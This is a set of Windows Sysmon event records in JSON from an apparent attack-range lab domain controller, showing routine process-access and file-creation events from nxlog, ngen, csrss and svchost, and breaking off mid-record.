{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.326\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.326","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.388\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010A5EA0F00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.388","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010A5EA0F00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010A5EA0F00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010A5EA0F00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010A5EA0F00}\r\nTargetProcessId: 4120\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010A5EA0F00}","TargetProcessId":"4120","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:37.498\r\nProcessGuid: {E2A3D6B1-138D-5F25-0000-00102AEF0F00}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Web.Abstractions.dll\r\nCreationUtcTime: 2020-08-01 07:02:37.498","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:37.498","ProcessGuid":"{E2A3D6B1-138D-5F25-0000-00102AEF0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Web.Abstractions.dll","CreationUtcTime":"2020-08-01 07:02:37.498","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.529\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-001069F20F00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 